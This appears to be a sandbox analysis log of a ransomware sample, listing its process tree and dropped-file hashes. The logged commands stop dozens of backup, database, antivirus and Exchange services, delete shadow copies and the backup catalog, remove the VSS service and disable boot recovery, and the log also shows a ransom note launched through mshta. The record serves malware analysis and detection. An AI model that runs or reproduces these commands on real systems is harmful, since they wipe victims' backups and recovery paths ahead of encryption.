C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:6348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:5576
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:6584
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5632
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:7520
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:5692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:8072
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:5836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:7104
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:8240
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:4052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:4884
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Culserver /y2⤵PID:3920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Culserver /y3⤵PID:3056
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sqladhlp /y2⤵PID:5404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sqladhlp /y3⤵PID:8992
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sqlagent /y2⤵PID:5568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sqlagent /y3⤵PID:5272
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sqlbrowser /y2⤵PID:5624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sqlbrowser /y3⤵PID:3420
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Sqlservr /y2⤵PID:5076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Sqlservr /y3⤵PID:8984
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:5456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:9036
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:5440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:9060
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:5152
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:2832
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" DefWatch2⤵PID:5340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 DefWatch3⤵PID:9092
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" wrapper2⤵PID:5384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 wrapper3⤵PID:9052
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mysql572⤵PID:5192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mysql573⤵PID:9084
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop -n apache242⤵PID:1092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop -n apache243⤵PID:9204
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:5304
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:9068
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:5160
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:6932
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QLADHLP /y2⤵PID:1716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QLADHLP /y3⤵PID:4844
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:6092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:5688
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:3324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:9196
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:6036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:9100
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C sc delete VSS2⤵PID:8088
-
C:\Windows\SysWOW64\sc.exesc delete VSS3⤵
- Launches sc.exe
PID:10192
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵PID:5324
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete2⤵PID:1708
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchange$ /y2⤵PID:6648
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchange /y2⤵PID:6640
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WSBExchange /y2⤵PID:6624
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:6616
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:6608
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:6600
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y2⤵PID:6592
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:6576
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:6568
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:6552
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:6544
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:6528
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:6520
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MVarmor64 /y2⤵PID:6512
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MVArmor /y2⤵PID:6496
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:6488
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:6480
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:6464
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:6456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:6440
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:6432
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:6424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:6408
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y2⤵PID:6400
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop backup /y2⤵PID:6380
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:6372
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:6364
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mepocs /y2⤵PID:6356
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop memtas /y2⤵PID:6340
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ /y2⤵PID:6332
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL /y2⤵PID:6316
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svc$ /y2⤵PID:6308
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sql /y2⤵PID:6300
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vss /y2⤵PID:6284
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:6276
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:6260
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBVSS /y2⤵PID:6252
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:6244
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:6228
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:6220
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:6212
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:6196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:6188
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:6180
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$MICROSOFT##SSEE /y2⤵PID:6160
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Exchange /y2⤵PID:6152
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql /y2⤵PID:3124
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$KAV_CS_ADMIN_KIT /y2⤵PID:3700
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:3524
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$KAV_CS_ADMIN_KIT /y2⤵PID:6044
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y2⤵PID:5936
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$MICROSOFT /y2⤵PID:4424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FishbowlMySQL /y2⤵PID:5232
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y2⤵PID:4840
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y2⤵PID:936
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:6032
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:5128
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ##WID /y2⤵PID:796
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$MICROSOFT /y2⤵PID:5276
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop dbeng8 /y2⤵PID:5268
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop dbsrv12 /y2⤵PID:5308
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vmware-converter /y2⤵PID:3892
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vmware /y2⤵PID:5092
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:5800
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tomcat6 /y2⤵PID:5868
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msmdsrv /y2⤵PID:5832
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:5852
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FCS /y2⤵PID:5640
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QuickBooks /y2⤵PID:5732
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit /y2⤵PID:5768
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:5960
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:5792
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no2⤵PID:6004
-
-
C:\Users\Admin\AppData\Local\Temp\lsm.exe"C:\Users\Admin\AppData\Local\Temp\lsm.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\is64.bat" "3⤵PID:5352
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵PID:5680
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵PID:9020
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵PID:9028
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵PID:5840
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵PID:8988
-
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"1⤵
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y1⤵PID:5040
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y1⤵PID:1492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop dbeng8 /y1⤵PID:3564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:8248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y1⤵PID:2968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:1244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y1⤵PID:5040
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵PID:9460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵PID:9488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MVarmor64 /y1⤵PID:9480
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FCS /y1⤵PID:9472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y1⤵PID:9452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:9436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:9428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop memtas /y1⤵PID:9420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL /y1⤵PID:9412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ /y1⤵PID:9404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ##WID /y1⤵PID:9396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$KAV_CS_ADMIN_KIT /y1⤵PID:9388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:9380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mepocs /y1⤵PID:9372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql /y1⤵PID:9364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MVArmor /y1⤵PID:9356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vmware /y1⤵PID:9348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vmware-converter /y1⤵PID:9340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop dbsrv12 /y1⤵PID:9332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵PID:9324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵PID:9316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:9308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tomcat6 /y1⤵PID:9300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:9292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$KAV_CS_ADMIN_KIT /y1⤵PID:9284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MICROSOFT##SSEE /y1⤵PID:9276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:9268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Exchange /y1⤵PID:9260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:9252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS /y1⤵PID:9244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵PID:9236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵PID:9228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:9220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:4704
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sql /y1⤵PID:5928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y1⤵PID:4232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:5320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svc$ /y1⤵PID:5932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:3808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FishbowlMySQL /y1⤵PID:856
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:2128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y1⤵PID:4360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MICROSOFT /y1⤵PID:788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:5784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y1⤵PID:5824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:5452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y1⤵PID:5132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y1⤵PID:2928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:1008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵PID:2712
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$MICROSOFT /y1⤵PID:3196
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:5628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:3776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:1276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QuickBooks /y1⤵PID:3200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit /y1⤵PID:9212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchange /y1⤵PID:9188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵PID:9148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchange$ /y1⤵PID:9140
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vss /y1⤵PID:9128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop backup /y1⤵PID:9112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmdsrv /y1⤵PID:9076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:9044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WSBExchange /y1⤵PID:8824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y1⤵PID:8816
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
181B
MD5225edee1d46e0a80610db26b275d72fb
SHA1ce206abf11aaf19278b72f5021cc64b1b427b7e8
SHA256e1befb57d724c9dc760cf42d7e0609212b22faeb2dc0c3ffe2fbd7134ff69559
SHA5124f01a2a248a1322cb690b7395b818d2780e46f4884e59f1ab96125d642b6358eea97c7fad6023ef17209b218daa9c88d15ea2b92f124ecb8434c0c7b4a710504
-
Filesize
3B
MD5a5ea0ad9260b1550a14cc58d2c39b03d
SHA1f0aedf295071ed34ab8c6a7692223d22b6a19841
SHA256f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04
SHA5127c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74
-
Filesize
75KB
MD57065c6c8efb58c65cbf97d1139fb3998
SHA1419e901005e12fbb7f6bbbf59e1802df4db56eb2
SHA25673b4ab2ae70beb4637920f181ba3f175374209178c86465ca92d333f034ae960
SHA5121f6883dae0d8f5d6877be5dc30f842bc8d7e1e69cbd45d723c0de3841b30ae042b4962c2b15b1b4c7f0eaf834374a6458d14f385a7934621a104157e91bea1bd
-
Filesize
75KB
MD57065c6c8efb58c65cbf97d1139fb3998
SHA1419e901005e12fbb7f6bbbf59e1802df4db56eb2
SHA25673b4ab2ae70beb4637920f181ba3f175374209178c86465ca92d333f034ae960
SHA5121f6883dae0d8f5d6877be5dc30f842bc8d7e1e69cbd45d723c0de3841b30ae042b4962c2b15b1b4c7f0eaf834374a6458d14f385a7934621a104157e91bea1bd
-
Filesize
89KB
MD537d55dba7a6114449a2453a5e5357c04
SHA134ea79d82409c679e8a5c32f5c469844dd2488d7
SHA25652003dbfea65f568115dfad09aa0402df57d488ca7f9eb23c7334a51c11deb9f
SHA512d493512c768e9412047e2ece774a670f636d9b380b63b617f8516eac6ed0de219e0daebc196549fafcd756cab1d44b87dd8cd6ddae712f529295ce9794c0a75e